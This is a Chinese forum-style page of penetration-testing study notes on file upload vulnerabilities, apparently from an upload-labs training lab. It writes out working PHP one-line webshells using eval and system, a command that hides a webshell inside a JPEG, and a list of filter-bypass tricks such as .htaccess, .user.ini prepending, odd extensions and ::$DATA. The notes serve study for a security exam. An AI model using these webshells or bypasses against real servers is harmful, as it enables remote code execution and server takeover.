当前位置:首页 > 编程笔记 > 正文
已解决

【PTE-day06 文件上传】

来自网友在路上 157857提问 提问时间:2023-11-09 04:44:10阅读次数: 57

最佳答案 问答题库578位专家为你答疑解惑

1、知识

X-Forwarded-For:表示HTTP请求端的真实IP

文件上传漏洞(头像更改、发邮件、上传资料等)

1、利用文件上传功能上传恶意文件:一句话木马文件、反弹shell的exe
2、上传文件的路径可访问
3、上传文件所在的路径具备可执行权限

一句话木马
传参方式:POST GET REQUEST
<?php @eval($_POST['c']);?>
@:防报错
eval() :代码执行函数<?php @system($_POST['c']);?>#将木马写到图片中
copy a.jpg/b+muma.php/a muma.jpg

2、文件上传

(1)靶场

http://116.205.189.153:9003/Pass-01/index.php

💷第一关前端过滤
禁用js
修改后缀
💸第二关文件类型过滤
黑名单过滤
💳第三关畸形后缀名–php php3 php4 php5 phtml
🧾第四关.htaccess
💹第五关.user.ini
auto_prepend_file=muma.jpg
auto_append_file=muma.jpg
readme.php
💶第六关大小写绕过
windows特性绕过–目标服务器为Windows服务器
💵第七关后缀加空格 '.php '–>.php
💴第八关后缀加. .php. -->.php
🪙第九关后缀加::$DATA
💰第十关后缀加. .
📆第十一关双写绕过

查看全文

99%的人还看了

猜你感兴趣

版权申明

本文"【PTE-day06 文件上传】":http://eshow365.cn/6-35873-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!